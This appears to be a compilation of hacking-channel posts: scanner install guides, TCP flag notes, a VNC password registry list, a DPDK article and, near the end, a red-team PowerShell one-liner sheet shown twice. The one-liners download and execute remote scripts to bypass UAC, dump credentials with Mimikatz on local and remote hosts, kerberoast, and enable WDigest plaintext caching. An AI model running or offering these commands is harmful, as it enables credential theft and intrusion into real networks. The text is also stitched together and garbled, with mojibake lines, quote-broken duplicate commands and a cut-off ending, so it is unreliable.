β β β Uππ»βΊπ«Δπ¬πβ β β β
Joomla web hacking: OWASP JoomScan
OWASP Joomla! Vulnerability Scanner (JoomScan) is an open source project developed to automate vulnerability detection and reliability assurance in Joomla CMS deployments. Implemented in Perl, it scans Joomla installations with a small footprint thanks to its lightweight, modular architecture. It detects known vulnerabilities as well as many misconfigurations and administrative shortcomings that adversaries can exploit to compromise the system, and it writes its final reports in both text and HTML formats to keep reporting overhead low.
OWASP JoomScan is included in Kali Linux distributions.
INSTALLATION & RUN:
1. git clone https://github.com/rezasp/joomscan.git
2. cd joomscan
3. perl joomscan.pl
4. For Docker installation and usage:
# Build the docker image
docker build -t rezasp/joomscan .
# Run a new docker container with the reports directory mounted from the host
docker run -it -v /path/to/reports:/home/joomscan/reports --name joomscan_cli rezasp/joomscan
5. To get a shell inside the container instead of running the scanner directly, override the entrypoint (remove the earlier container first with docker rm joomscan_cli, since the same name is reused):
docker run -it -v /path/to/reports:/home/joomscan/reports --name joomscan_cli --entrypoint /bin/bash rezasp/joomscan
6. Default checks:
perl joomscan.pl --url www.example.com
or
perl joomscan.pl -u www.example.com
7. Enumerate installed components:
perl joomscan.pl --url www.example.com --enumerate-components
or
perl joomscan.pl -u www.example.com --ec
Set a cookie:
perl joomscan.pl --url www.example.com --cookie "test=demo;"
Set the user agent:
perl joomscan.pl --url www.example.com --user-agent "Googlebot/2.1 (+http://www.googlebot.com/bot.html)"
FEATURES:
Automated:
*Version enumerator
*Vulnerability enumerator (based on version)
*Components enumerator (1209 most popular by default)
*Components vulnerability enumerator (based on version) (+1030 exploits)
*Firewall detector
*Reporting to Text & HTML output
*Finding common log files
*Finding common backup files
Enjoy!
Source: git (https://github.com/rezasp/joomscan)
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
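The version enumerator is the simplest of the checks above to reproduce by hand. Below is an added example, not JoomScan's own code: it requests the XML manifests a stock Joomla install leaves world-readable and reads the <version> element, which is the fingerprint that the version-based vulnerability lookup keys on. The manifest paths are real Joomla files; the host name, the sample manifest and its version number are constructed.

```python
"""Joomla version fingerprinting, the first step JoomScan's version
enumerator performs. Added example, not JoomScan's code: stock Joomla
installs publish their core version in a few world-readable XML manifests,
so fetching and parsing them yields the exact release. The sample manifest
below is constructed; only the element names match real Joomla files."""
import urllib.request
import xml.etree.ElementTree as ET
from typing import Callable, Optional, Tuple

# Manifest paths that carry a <version> element in stock Joomla installs,
# tried in order; the first one that parses wins.
VERSION_PATHS = (
    "/administrator/manifests/files/joomla.xml",
    "/language/en-GB/en-GB.xml",
    "/administrator/language/en-GB/en-GB.xml",
)


def parse_version(xml_text: str) -> Optional[str]:
    """Return the text of the first <version> element, or None if the
    document is not XML or has no such element."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError:
        return None
    node = root.find(".//version")
    if node is None or not node.text or not node.text.strip():
        return None
    return node.text.strip()


def fetch(url: str, timeout: float = 10.0) -> Optional[str]:
    """GET a URL and return its body as text; None on any HTTP or network error."""
    req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.read().decode("utf-8", errors="replace")
    except Exception:
        return None


def fingerprint(base_url: str,
                fetcher: Callable[[str], Optional[str]] = fetch) -> Optional[Tuple[str, str]]:
    """Try each manifest path under base_url; return (path, version) for the first hit."""
    base_url = base_url.rstrip("/")
    for path in VERSION_PATHS:
        body = fetcher(base_url + path)
        if body is None:
            continue
        version = parse_version(body)
        if version:
            return path, version
    return None


# Constructed sample: a trimmed administrator/manifests/files/joomla.xml.
# The version string is an example value, not a real fingerprint.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="UTF-8"?>
<extension version="3.6" type="file" method="upgrade">
    <name>files_joomla</name>
    <author>Joomla! Project</author>
    <version>3.9.1</version>
    <description>FILES_JOOMLA_XML_DESCRIPTION</description>
</extension>
"""


def offline_demo() -> Optional[Tuple[str, str]]:
    """Run fingerprint() against an in-memory 'site' that serves only joomla.xml
    (hypothetical host name; nothing is sent over the network)."""
    def fake_fetch(url: str) -> Optional[str]:
        return SAMPLE_MANIFEST if url.endswith(VERSION_PATHS[0]) else None
    return fingerprint("http://target.example", fetcher=fake_fetch)


if __name__ == "__main__":
    import sys
    result = fingerprint(sys.argv[1]) if len(sys.argv) > 1 else offline_demo()
    print("Joomla version not found" if result is None
          else "Joomla %s (from %s)" % (result[1], result[0]))
```

Pass a base URL as the first argument to fingerprint a live site; with no argument it runs against the constructed manifest. Sites that block direct access to the manifests (some hardening guides recommend it) simply return None, which is itself a useful signal.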
β β β Uππ»βΊπ«Δπ¬πβ β β β
BEST HACKING PROGRAMMING LANGUAGES:
#ForBeginners
1. Python
Python is one of the most commonly used programming languages among developers. Many large enterprises build products with it (NASA, Google, Instagram, Spotify, Uber, Netflix and others), and it is liked by beginners and professionals alike, which explains its popularity. If you work in big data, Python is arguably the best fit.
2. R
R connects easily to a database management system (DBMS), although it does not offer a spreadsheet-style view of the data. Its greater strength is the variety of graphical functions it provides for data representation: bar charts, pie charts, time series, dot plots, 3D surfaces, image plots, maps, scatter plots and so on. R makes it easy to customize these graphics and to develop novel, distinctive visualizations.
3. Java
Since its appearance Java has been widely known for its versatility in data science and engineering. The open source Hadoop framework, including HDFS for storing and processing big data, is written almost entirely in Java. Java is also widely used to build ETL applications such as Apache Kafka and Apache Camel, which run data extraction, transformation and loading in big data environments.
4. Scala
Scala is an open source high-level programming language, currently used mainly in the financial industry. Its main relevance to big data is Apache Spark: the cluster computing framework for big data applications is itself written in Scala. Big data practitioners are generally expected to have extensive knowledge of and hands-on experience with Scala.
5. Kotlin
Kotlin is a very good language for Android application development and runs on the JVM. To some extent it overcomes Java's shortcomings and provides many modern features. Its main strength is its language design, which offers null safety, type inference and more. Because Kotlin also runs on the JVM, the huge ecosystem of existing Java libraries is available to it.
6. Go
Go has great concurrency support. It uses goroutines (lightweight green threads) and channels for message passing. Rather than encouraging shared-memory concurrency through threads and locks, which makes programs harder to get right, it provides CSP-style message-passing concurrency.
Go's most appreciated feature is simplicity: novice developers can write efficient code in just a few days, much as with Python. Moreover, many large cloud-native projects are written in Go.
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
Warning: all Windows 10 users, especially those on the 2019 releases and lower, should update their systems.
The old XP SP3 is sometimes more secure than Win 10 2019 :)
β β β Uππ»βΊπ«Δπ¬πβ β β β
Where does Windows store VNC passwords?
#fastTips
VNC servers on Windows store their passwords in the registry under the following keys (the list may be incomplete):
HKEY_LOCAL_MACHINE\SOFTWARE\TigerVNC\WinVNC4
HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server
HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default
HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4
HKEY_CURRENT_USER\Software\TightVNC
HKEY_CURRENT_USER\Software\TurboVNC
HKEY_CURRENT_USER\Software\ORL\WinVNC3\Password
HKEY_USERS\.DEFAULT\Software\ORL\WinVNC3\Password
> The password is stored in binary form (REG_BINARY) and is 8 bytes long. That is an obfuscation with a fixed key rather than a hash, so anyone who can read the value can recover the cleartext; treat read access to these keys as equivalent to knowing the password. On 64-bit Windows a 32-bit VNC build writes its HKEY_LOCAL_MACHINE\SOFTWARE keys under SOFTWARE\WOW6432Node instead.
β β β Uππ»βΊπ«Δπ¬πβ β β β
TCP header flags used to identify the state of a TCP connection (bit numbers count from the start of the TCP header: bits 96-99 are the data offset, 100-102 are reserved, 103-111 are the flags):
> NS - bit 103. ECN-nonce concealment protection (RFC 3540).
> CWR - bit 104. Congestion Window Reduced: set by the sender to signal that it received a segment with the ECE flag set and has reduced its congestion window.
> ECE - bit 105. ECN-Echo: in a SYN it indicates that the peer is ECN capable (explicit congestion notification); in an established connection it tells the sender that the network is congested (RFC 3168).
> URG - bit 106. The urgent pointer field is significant: 0 means the Urgent Pointer is not used, 1 means it is.
> ACK - bit 107. Set on a segment to indicate that it acknowledges data received from the other side. Acknowledgements tell the sender which data actually arrived intact; when the bit is set, the original sender checks the acknowledgement number to see which segments are confirmed and frees them from its retransmission buffers.
> PSH - bit 108. The PUSH flag instructs TCP on any intermediate host, and on the receiving host, to hand the data to the application immediately. It pushes through all buffered data, regardless of how much of the TCP window has already been transmitted.
> RST - bit 109. RESET tells the other end to tear down the connection. It is used in several scenarios, mainly when the connection has been aborted for some reason, when no such connection exists, or when the packet is somehow wrong.
> SYN - bit 110. SYN (synchronize sequence numbers) is used only during connection establishment. It is set in two cases: the initial packet that opens the connection and the SYN/ACK response. It should never appear outside these cases.
> FIN - bit 111. FIN indicates that the sending host has no more data to send. When the other end sees the FIN it acknowledges it (often combined with its own FIN as FIN/ACK). After that the host that sent the FIN can no longer send data, but the other end may keep sending until it is done, then sends its own FIN and waits for the final ACK, after which the connection goes to the CLOSED state.
written by UnderCode
powered by wiki
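To make the bit positions concrete, here is an added example (not part of the original post) that decodes the nine flag bits from a raw TCP header and names the connection phase they belong to, including the combinations no compliant stack sends (no flags, FIN/PSH/URG, SYN together with FIN), which are the classic NULL, Xmas and SYN/FIN scan signatures. The segments it parses are constructed in memory.

```python
"""Decode and classify the TCP flag bits described above (header bits
103-111). Added example, not part of the original post; the segments it
parses are constructed in memory with build_tcp_header()."""
import struct
from typing import Dict, List

# Flag name -> (byte offset in the TCP header, bit mask). Header bit 103 is
# the lowest bit of byte 12 (NS, after the 4-bit data offset and 3 reserved
# bits); bits 104-111 are byte 13, CWR in the high bit down to FIN in the low bit.
TCP_FLAGS = {
    "NS":  (12, 0x01),
    "CWR": (13, 0x80),
    "ECE": (13, 0x40),
    "URG": (13, 0x20),
    "ACK": (13, 0x10),
    "PSH": (13, 0x08),
    "RST": (13, 0x04),
    "SYN": (13, 0x02),
    "FIN": (13, 0x01),
}


def parse_tcp_header(segment: bytes) -> Dict[str, object]:
    """Return ports, sequence numbers, data offset and the list of set flags."""
    if len(segment) < 20:
        raise ValueError("a TCP header is at least 20 bytes")
    sport, dport, seq, ack, off_ns, _flags8 = struct.unpack("!HHIIBB", segment[:14])
    data_offset = (off_ns >> 4) * 4            # header length in bytes
    flags = [name for name, (byte, mask) in TCP_FLAGS.items() if segment[byte] & mask]
    return {"sport": sport, "dport": dport, "seq": seq, "ack": ack,
            "data_offset": data_offset, "flags": flags}


def classify(flags: List[str]) -> str:
    """Name the connection phase a flag combination belongs to, and call out
    the combinations a compliant stack never sends (classic scan signatures)."""
    s = set(flags)
    if not s:
        return "anomaly: no flags (NULL scan)"
    if s == {"FIN", "PSH", "URG"}:
        return "anomaly: FIN/PSH/URG (Xmas scan)"
    if {"SYN", "FIN"} <= s:
        return "anomaly: SYN and FIN together"
    if "RST" in s:
        return "reset"
    if {"SYN", "ACK"} <= s:
        return "handshake: SYN/ACK (responder)"
    if "SYN" in s:
        return "handshake: SYN (initiator)"
    if "FIN" in s:
        return "teardown: FIN"
    if "ACK" in s:
        return "established"
    return "anomaly: data flags without ACK"


def build_tcp_header(sport: int, dport: int, seq: int, ack: int,
                     flags: List[str], window: int = 65535) -> bytes:
    """Constructed 20-byte TCP header (no options, zero checksum) for testing."""
    off_ns = 5 << 4                            # data offset 5 words = 20 bytes
    flags8 = 0
    for name in flags:
        byte, mask = TCP_FLAGS[name]
        if byte == 12:
            off_ns |= mask
        else:
            flags8 |= mask
    return struct.pack("!HHIIBBHHH", sport, dport, seq, ack, off_ns, flags8, window, 0, 0)


if __name__ == "__main__":
    for combo in (["SYN"], ["SYN", "ACK"], ["ACK"], ["FIN", "ACK"], ["RST"],
                  [], ["FIN", "PSH", "URG"], ["SYN", "FIN"]):
        hdr = parse_tcp_header(build_tcp_header(40000, 80, 1, 0, combo))
        print("%-14s -> %s" % ("/".join(hdr["flags"]) or "-", classify(hdr["flags"])))
```

The same parse works on bytes sliced out of a pcap at the TCP header offset; the classification is the kind of rule an IDS applies per segment, so the anomaly strings are deliberately distinct from the normal phases.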
β β β Uππ»βΊπ«Δπ¬πβ β β β
ReverseAPK: quickly analyze and reverse engineer Android applications.
F E A T U R E S :
> Displays all extracted files for easy reference
> Automatically decompiles APK files to Java and Smali format
> Analyzes AndroidManifest.xml for common vulnerabilities and behavior
> Static source code analysis for common vulnerabilities and behavior:
Device info
Intents
Command execution
SQLite references
Logging references
Content providers
Broadcast receivers
Service references
File references
Crypto references
Hardcoded secrets
URLs
Network connections
SSL references
WebView references
- Termux / Linux
INSTALLATION & RUN:
1. git clone https://github.com/1N3/ReverseAPK.git
2. cd ReverseAPK
3. ./install
4. To use:
> reverse-apk <apk_name>
That's all!
Enjoy!
Source: git (https://github.com/1N3/ReverseAPK)
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
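The manifest analysis is the part of this workflow that is easy to reproduce without the tool. The following is an added example, not ReverseAPK's code: it applies a handful of the common AndroidManifest.xml checks (debuggable build, backup allowed, cleartext traffic, components exported without a permission) to the decoded manifest that apktool produces. The sample manifest is constructed, with a hypothetical package name and component names.

```python
"""Static review of a decoded AndroidManifest.xml, the kind of check
ReverseAPK's manifest analysis performs. Added example, not ReverseAPK's
code; the manifest below is constructed. Feed it the text manifest that
apktool writes when it decodes an APK."""
import xml.etree.ElementTree as ET
from typing import List

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "activity-alias", "service", "receiver", "provider")


def a(attr: str) -> str:
    """Qualified name of an android: attribute as ElementTree sees it."""
    return "{%s}%s" % (ANDROID_NS, attr)


def is_launcher(component: ET.Element) -> bool:
    """The MAIN/LAUNCHER activity has to be exported; don't report it."""
    for f in component.findall("intent-filter"):
        actions = {x.get(a("name")) for x in f.findall("action")}
        cats = {x.get(a("name")) for x in f.findall("category")}
        if "android.intent.action.MAIN" in actions and "android.intent.category.LAUNCHER" in cats:
            return True
    return False


def is_exported(component: ET.Element) -> bool:
    """An explicit android:exported wins. Otherwise an activity, service or
    receiver with an intent-filter is implicitly exported; providers are only
    reported here when exported="true" is explicit."""
    exported = component.get(a("exported"))
    if exported is not None:
        return exported == "true"
    if component.tag == "provider":
        return False
    return component.find("intent-filter") is not None


def analyze_manifest(xml_text: str) -> List[str]:
    """Return one finding string per weak setting; empty list means nothing flagged."""
    findings: List[str] = []
    root = ET.fromstring(xml_text)
    app = root.find("application")
    if app is None:
        return ["manifest has no <application> element"]
    if app.get(a("debuggable")) == "true":
        findings.append('application is debuggable (android:debuggable="true")')
    if app.get(a("allowBackup"), "true") == "true":      # platform default is true
        findings.append('ADB backup allowed (android:allowBackup not set to "false")')
    if app.get(a("usesCleartextTraffic")) == "true":
        findings.append('cleartext HTTP allowed (android:usesCleartextTraffic="true")')
    for comp in app:
        if comp.tag not in COMPONENT_TAGS:
            continue
        name = comp.get(a("name"), "?")
        if is_exported(comp) and not is_launcher(comp) and comp.get(a("permission")) is None:
            findings.append("%s %s is exported without a permission" % (comp.tag, name))
    return findings


# Constructed manifest with a hypothetical package; every component name is made up.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.demo">
  <uses-permission android:name="android.permission.INTERNET"/>
  <application android:debuggable="true" android:usesCleartextTraffic="true">
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <activity android:name=".DeepLinkActivity">
      <intent-filter>
        <action android:name="android.intent.action.VIEW"/>
        <data android:scheme="demo"/>
      </intent-filter>
    </activity>
    <receiver android:name=".BootReceiver" android:exported="true"/>
    <service android:name=".SyncService" android:exported="true" android:permission="com.example.demo.SYNC"/>
    <provider android:name=".DataProvider" android:authorities="com.example.demo.data" android:exported="true"/>
  </application>
</manifest>
"""

if __name__ == "__main__":
    import sys
    text = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE_MANIFEST
    for line in analyze_manifest(text):
        print("[!]", line)
```

Point it at AndroidManifest.xml from an apktool output directory; the binary manifest inside the APK itself is not XML text and must be decoded first. Exported-without-permission is a starting point, not a verdict: each flagged component still needs a look at what the intent it receives can make it do.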
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from WEB UNDERCODE - PRIVATE
Attachment: Wordpress_Plugin_Powie's_WHOIS_Domain_Check_0_9_31_Persistent_Cross.txt (5.3 KB)
2020 interesting CVE: WordPress Plugin Powie's WHOIS Domain Check 0.9.31 - Persistent Cross-Site Scripting
- Leaked, then uploaded to the CVE site
β β β Uππ»βΊπ«Δπ¬πβ β β β
Changes in the Linux network data forwarding plane: from the kernel protocol stack to DPDK/XDP
> Roughly speaking, as IO devices have evolved their access and transfer rates have exceeded the CPU-to-memory storage and transfer rate, so they can no longer be treated as slow peripherals. The way these devices are managed has to adapt to that change, and in this sense the largely unchanged Linux kernel does hinder performance optimization in many ways.
> This may be the essential reason people are now turning to DPDK/netmap or XDP. Why is that?
In most people's minds a standard computer consists of three major pieces:
1) The CPU, the central processing unit.
2) Memory, hanging off a chip resembling the North Bridge.
3) Peripherals, the slow IO devices, hanging off a chip resembling the South Bridge.
This is what we learned in the course "Principles of Computer Organization", and it is what real computers look like. The von Neumann abstraction, by contrast, does not include peripherals at all: it consists only of CPU and memory, emphasizing storage and execution, the stored-program computer.
Given the actual composition of a computer, the next step is to design an operating system to manage these things. In fact almost any operating system can be divided into modules along the same lines:
1) Process management: CPU time-sharing and scheduling.
2) Memory management: memory allocation.
3) File system: organization of files.
4) Network protocol stack: network IO.
5) Disk drivers, ...
...
From the very beginning the objects named above other than the CPU and memory, that is the peripherals (disks included), have been attached through relatively slow bridge chips. The assumption behind this is that, relative to the CPU and memory, these IO devices are slow.
> Therefore, to manage these slow devices, the operating system had to design complicated mechanisms for rate adaptation, data caching and so on; Unix/Linux and Windows alike were designed under this assumption.
However, things are quietly changing: peripherals are becoming faster and smarter, almost on a par with the CPU. More and more peripherals have their own built-in memory, as if another CPU/memory pair were hanging off the same motherboard...
At this point the operating system would be better suited to the role of coordinator rather than manager, but the complex management mechanisms of the old era remain. Take the network protocol stack as an example:
1) Synchronization overhead on the various linked lists in a multi-CPU environment.
2) The non-sleepable soft interrupt path is too long.
3) Allocation and release of sk_buff.
4) Memory copy overhead.
5) Cache misses caused by context switching.
...
Clearly, with the 10 Mbps / 100 Mbps network cards of the slow era these mechanisms were no problem; back then the application spent most of its time waiting for the card to send data. In the era of 1000 Mbps / 10 Gbps / 40 Gbps cards the reverse is true: data is received quickly, but it all gets stuck in the kernel.
Various optimization measures therefore followed the demand:
1) NIC RSS and multiple queues.
2) Threaded interrupt handling.
3) Finer lock granularity.
4) Busy polling.
Share us!
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')"
# Invoke-MassMimikatz: Use to dump creds on remote host [replace $env:computername with target server name(s)]
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1');'$env:COMPUTERNAME'|Invoke-MassMimikatz -Verbose"
# PowerUp: Privilege escalation checks
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1');Invoke-AllChecks"
# Invoke-Inveigh and log output to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -Proxy Y -LogOutput Y -FileOutput Y"
# Invoke-Kerberoast and provide Hashcat compatible hashes
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-kerberoast -OutputFormat Hashcat"
# Invoke-ShareFinder and print output to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"
# Import PowerView Module to run further commands
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"
# Invoke-Bloodhound
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"
# Find GPP Passwords in SYSVOL
findstr /S cpassword $env:logonserver\sysvol\*.xml
findstr /S cpassword %logonserver%\sysvol\*.xml (cmd.exe)
# Run Powershell prompt as a different user, without loading profile to the machine [replace DOMAIN and USER]
runas /user:DOMAIN\USER /noprofile powershell.exe
# Insert reg key to enable WDigest on newer versions of Windows (cleartext credentials are then kept in LSASS only for logons that happen after the change, so a user has to log on again before Invoke-Mimikatz will show them)
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
Enjoy!
Source: git
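The findstr one-liner above finds the string; the added example below (not part of the original collection) parses the GPP XML properly, so every cpassword is reported together with the account it belongs to and the file it came from, which is what you need to prioritize them. The Groups.xml and ScheduledTasks.xml samples are constructed, and the cpassword values in them are placeholders, not real ciphertext.

```python
"""Find Group Policy Preferences credentials ('cpassword' attributes) in
SYSVOL XML, the structured counterpart of the findstr one-liner above.
Added example, not part of the original post; the sample files are
constructed. Point scan_sysvol() at the domain SYSVOL share or a copy of it."""
from pathlib import Path
from typing import Dict, List
import xml.etree.ElementTree as ET

# Attributes that name the account a cpassword belongs to, across the GPP
# file types that carry one (Groups.xml, ScheduledTasks.xml, Services.xml,
# DataSources.xml, Drives.xml).
ACCOUNT_ATTRS = ("userName", "runAs", "accountName", "username")


def find_cpasswords(xml_text: str, source: str = "<memory>") -> List[Dict[str, str]]:
    """Return one record per element carrying a cpassword attribute."""
    hits: List[Dict[str, str]] = []
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError:
        return hits
    for elem in root.iter():
        cp = elem.get("cpassword")
        if cp is None:                      # attribute absent on this element
            continue
        account = next((elem.get(k) for k in ACCOUNT_ATTRS if elem.get(k)), "?")
        hits.append({"file": source, "element": elem.tag, "account": account,
                     "cpassword": cp, "empty": "yes" if cp == "" else "no"})
    return hits


def scan_sysvol(root_dir: str) -> List[Dict[str, str]]:
    """Walk a SYSVOL tree (or a copy of it) and collect cpasswords from every *.xml."""
    hits: List[Dict[str, str]] = []
    for path in Path(root_dir).rglob("*.xml"):
        try:
            text = path.read_text(encoding="utf-8-sig", errors="replace")
        except OSError:
            continue
        hits.extend(find_cpasswords(text, str(path)))
    return hits


# Constructed Groups.xml: a local user whose password was set via GPP.
# The cpassword is a placeholder string, not real ciphertext.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="Administrator (built-in)" image="2" changed="2019-06-01 10:00:00">
    <Properties action="U" newName="" fullName="" description="" cpassword="c0nstructedPlaceholderNotRealCiphertext=" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="Administrator (built-in)"/>
  </User>
</Groups>
"""

# Constructed ScheduledTasks.xml: a task running as a domain service account.
SAMPLE_TASKS_XML = """<?xml version="1.0" encoding="utf-8"?>
<ScheduledTasks>
  <Task name="Backup" image="0" changed="2019-06-01 10:05:00">
    <Properties action="C" name="Backup" appName="backup.exe" runAs="CORP\\svc_backup" cpassword="an0therPlaceholderValue=" startIn="" comment=""/>
  </Task>
</ScheduledTasks>
"""

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        results = scan_sysvol(sys.argv[1])
    else:
        results = (find_cpasswords(SAMPLE_GROUPS_XML, "Groups.xml") +
                   find_cpasswords(SAMPLE_TASKS_XML, "ScheduledTasks.xml"))
    for r in results:
        print("%s: <%s> account=%s empty=%s cpassword=%s" %
              (r["file"], r["element"], r["account"], r["empty"], r["cpassword"]))
```

An empty cpassword is still worth reporting: it means the policy sets a blank password. As a defender, the same scan over SYSVOL tells you which policies still need the credential removed after MS14-025 stopped new ones being created.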
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')"
# Invoke-MassMimikatz: Use to dump creds on remote host [replace $env:computername with target server name(s)]
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1');'$env:COMPUTERNAME'|Invoke-MassMimikatz -Verbose"
# PowerUp: Privilege escalation checks
powershell.exe -exec Bypass -C βIEX (New-Object Net.WebClient).DownloadString(βhttps://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1β);Invoke-AllChecksβ
# Invoke-Inveigh and log output to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y βNBNS Y βmDNS Y βProxy Y -LogOutput Y -FileOutput Y"
# Invoke-Kerberoast and provide Hashcat compatible hashes
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-kerberoast -OutputFormat Hashcat"
# Invoke-ShareFinder and print output to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"
# Import PowerView Module to run further commands
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"
# Invoke-Bloodhound
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"
# Find GPP Passwords in SYSVOL
findstr /S cpassword $env:logonserver\sysvol\*.xml
findstr /S cpassword %logonserver%\sysvol\*.xml (cmd.exe)
# Run Powershell prompt as a different user, without loading profile to the machine [replace DOMAIN and USER]
runas /user:DOMAIN\USER /noprofile powershell.exe
# Insert reg key to enable Wdigest (plaintext credential caching) on newer versions of Windows
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\Wdigest /v UseLogonCredential /t REG_DWORD /d 1
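A defender's counterpart to the GPP cpassword search above, as an added example that is not part of the original cheat sheet: it walks a SYSVOL-style directory and reports every Group Policy Preferences item that still carries a cpassword attribute, so the items can be removed. The sample SYSVOL, its GPO GUID, file contents and account names are constructed in a temp directory and are not real values.

```python
"""Audit a SYSVOL tree for Group Policy Preferences XML files that still carry a
cpassword attribute (what the findstr one-liner above greps for).  Added example,
not from the cheat sheet: it reports where the attribute occurs and decrypts nothing."""
import os
import tempfile
import xml.etree.ElementTree as ET

# GPP preference files that may embed an account password; they live under
# Policies/<GPO-GUID>/{Machine,User}/Preferences/<Area>/ in SYSVOL.
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}
# Attribute naming the account a cpassword belongs to (differs per file type).
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")


def gpo_guid(path):
    """Return the {GUID} component of a SYSVOL policy path, or None."""
    for part in path.replace("\\", "/").split("/"):
        if part.startswith("{") and part.endswith("}"):
            return part
    return None


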